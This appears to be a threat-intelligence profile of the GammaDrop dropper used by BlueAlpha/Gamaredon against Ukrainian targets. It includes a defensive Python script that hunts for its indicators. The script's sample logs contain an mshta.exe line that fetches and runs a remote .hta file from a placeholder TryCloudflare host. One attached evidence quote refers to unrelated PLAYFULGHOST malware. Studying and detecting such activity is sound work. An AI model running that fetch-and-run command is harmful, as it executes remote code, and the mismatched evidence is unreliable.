GammaDrop
GammaDrop is a malware dropper associated with the Russian FSB-directed threat group BlueAlpha, which overlaps with Gamaredon, Shuckworm, Hive0051, and UNC530 and has targeted Ukrainian organizations since at least 2014. Reporting states that BlueAlpha has used GammaDrop in spearphishing-driven delivery chains, including HTML smuggling with embedded JavaScript and modified deobfuscation methods such as use of the onerror HTML event. BlueAlpha has also used Cloudflare Tunnels, specifically randomly generated TryCloudflare subdomains, to conceal GammaDrop staging infrastructure and evade traditional network detection.

GammaDrop’s documented role is to write the VBScript malware GammaLoad to disk and establish persistence on the victim system. GammaLoad is described as a custom loader used since at least October 2023 for data exfiltration, credential theft, persistent access, command-and-control beaconing, and execution of additional malware.

The reporting also notes BlueAlpha’s use of obfuscation techniques including junk code and random variable names, as well as DNS fast-fluxing to complicate tracking and disruption of command-and-control infrastructure. High-confidence detection-relevant details mentioned in the content include delivery via HTML attachments used for HTML smuggling, suspicious use of mshta.exe, untrusted .lnk files, requests to trycloudflare.com subdomains, and unauthorized DNS-over-HTTPS activity.
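The detection-relevant details listed above (mshta.exe execution, shortcut files launched from untrusted locations, TryCloudflare subdomain contact, DNS-over-HTTPS use, and HTML attachments) can be turned into a small triage pass over endpoint and network telemetry. The script below is an added example written for this page, not code from Mallory or from any of the cited reports; the key=value log format, the sample lines, the TryCloudflare subdomain names, the list of "untrusted" shortcut directories, and the watchlist of public DoH resolver hostnames are all constructed assumptions that a practitioner would replace with their own schema and policy.

```python
"""Triage telemetry lines for the GammaDrop/BlueAlpha indicators described above.
Added example; the log schema and sample events are constructed, not a vendor format."""
import re
from collections import Counter

# Constructed sample telemetry. The trycloudflare.com labels are made-up placeholders
# in the random-words style of TryCloudflare subdomains, not real observed indicators.
SAMPLE_LOGS = [
    'type=process host=ws01 image=C:\\Windows\\System32\\mshta.exe '
    'cmdline="mshta.exe https://tame-gifted-bingo.trycloudflare.com/x.hta"',
    'type=process host=ws01 image=C:\\Windows\\explorer.exe '
    'cmdline="C:\\Users\\ann\\Downloads\\report.lnk"',
    'type=dns host=ws01 query=clever-jazz-owl.trycloudflare.com',
    'type=http host=ws02 dest=cloudflare-dns.com path=/dns-query',
    'type=email host=mx01 attachment=invoice.html',
    'type=process host=ws02 image=C:\\Program Files\\App\\app.exe cmdline="app.exe --update"',
    'type=dns host=ws02 query=www.example.org',
]

KV = re.compile(r'(\w+)=("[^"]*"|\S+)')            # key=value, values may be quoted
TRYCLOUDFLARE = re.compile(r'(^|\.)trycloudflare\.com$', re.I)
# Assumed watchlist of well-known public DoH resolvers; an environment that sanctions
# DoH through one resolver would remove that resolver from this set.
DOH_HOSTS = {"cloudflare-dns.com", "dns.google", "dns.quad9.net"}
# Assumed "untrusted" shortcut locations: user-writable download and temp directories.
UNTRUSTED_DIRS = re.compile(r'\\(Downloads|Temp|AppData\\Local\\Temp)\\', re.I)


def parse_event(line):
    """Turn one key=value telemetry line into a dict with surrounding quotes stripped."""
    return {k: v.strip('"') for k, v in KV.findall(line)}


def hosts_in(text):
    """Extract hostnames from any http(s) URLs embedded in a command line."""
    return re.findall(r'https?://([A-Za-z0-9.-]+)', text, re.I)


def check_event(ev):
    """Return the list of rule names that fire on a single parsed event."""
    hits = []
    t = ev.get("type")
    if t == "process":
        image = ev.get("image", "").lower()
        cmd = ev.get("cmdline", "")
        if image.endswith("\\mshta.exe"):
            hits.append("mshta_execution")
        if cmd.lower().endswith(".lnk") and UNTRUSTED_DIRS.search(cmd):
            hits.append("untrusted_lnk")
        if any(TRYCLOUDFLARE.search(h) for h in hosts_in(cmd)):
            hits.append("trycloudflare_contact")
    elif t == "dns" and TRYCLOUDFLARE.search(ev.get("query", "")):
        hits.append("trycloudflare_contact")
    elif t == "http":
        if ev.get("dest", "").lower() in DOH_HOSTS or ev.get("path") == "/dns-query":
            hits.append("doh_activity")
    elif t == "email" and ev.get("attachment", "").lower().endswith((".html", ".htm")):
        hits.append("html_attachment")
    return hits


def hunt(lines):
    """Run every rule over every line; yields (rule, host, raw line) findings."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        for rule in check_event(ev):
            findings.append((rule, ev.get("host", "?"), line))
    return findings


def summarize(findings):
    """Count findings per rule, which is what an analyst would page on."""
    return Counter(rule for rule, _, _ in findings)


if __name__ == "__main__":
    for rule, host, line in hunt(SAMPLE_LOGS):
        print(f"[{rule}] {host}: {line}")
    print(dict(summarize(hunt(SAMPLE_LOGS))))
```

On the constructed sample the mshta line fires twice (once for the binary, once for the TryCloudflare URL in its arguments), which is the kind of stacking an analyst would want to see: a single event matching two of the page's indicators is far higher confidence than either alone. The HTML-attachment rule is deliberately the noisiest and is best used as context for the other hits rather than as a standalone alert.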
Groups observed using it
3 distinct threat actors attributed by public researchers.
GammaDrop: acts as a dropper, writing GammaLoad to disk and ensuring persistence
Techniques & procedures
6 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
Evidence: "PLAYFULGHOST Delivered via Phishing and SEO Poisoning"; "Victims get infected via phishing emails"; "phishing campaign" (multiple entries)
BlueAlpha has been active since at least 2014 and continues to target Ukrainian organizations through relentless spearphishing campaigns to distribute custom malware.
Stealth
2 techniques
BlueAlpha uses obfuscation techniques, namely extensive amounts of junk code and random variable names, to complicate analysis.
The group delivers malware through HTML smuggling, leveraging sophisticated techniques to bypass email security systems.
Command and Control
2 techniques
BlueAlpha uses Cloudflare Tunnels to conceal its GammaDrop staging infrastructure, evading traditional network detection mechanisms.
Recent activity
3 sources tracked across advisories, community write-ups, and news.
Malware used by Gamaredon in spear-phishing campaigns; infrastructure concealed using Cloudflare Tunnels and DNS fast-flux.
Malware dropper in BlueAlpha's malware suite that is staged via Cloudflare Tunnels and used to write GammaLoad to disk and establish persistence.